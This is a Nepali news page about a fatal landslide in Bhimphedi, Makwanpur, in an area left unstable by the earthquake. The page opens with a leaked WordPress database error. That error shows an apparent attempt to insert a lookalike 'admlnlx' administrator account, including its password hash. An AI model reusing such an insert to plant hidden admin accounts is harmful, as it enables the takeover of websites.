WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzQU/dAZkQmlw7l/YsJazF3Pdc8KP60', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 22:44:36', '', 'admlnlx', 'admlnlx')
हेटौंडा,माघ १६ –
मकवानपुर भीमफेदी गाविस ३ पानीघाटमा पहिरोले पुरिएर एक जनाको मृत्यू भएको छ। शनिबार राती घरमाथिको पहाडबाट खसेको पहिरोमा पुरिएर सुतिरहेका २३ वर्षका बरुण थोकरको मृत्यु भएको इलाका प्रहरी कार्यालय भीमफेदीले जानकारी दिएको छ।
उक्त पहिरो गएको ठाउँ २०७२ को विनाशकारी भूकम्पले क्षतविक्षत भएको थियो। भूकम्प जाँदा मानवबस्ती सार्न पीडितको लागि भीमफेदी–४ स्थित हात्तीसारमा नेपाली सेनाले अस्थायी आवास बनाइदिएको भएपनि प्रयोगबिहीन छ। सम्बन्धित निकायले जोखिममा बसेका बासिन्दालाई अन्यत्र स्थानान्तरण नगरेमा अझ ठूलो मानवीय क्षति व्यहोर्नुपर्ने स्थानीयहरुको भनाई छ। भूकम्पले जोखिम बनाएको गाउँहरुमा पनि स्थानीयहरु अझै सामान्य टहरा बनाएर बसोबास गरेका छन्।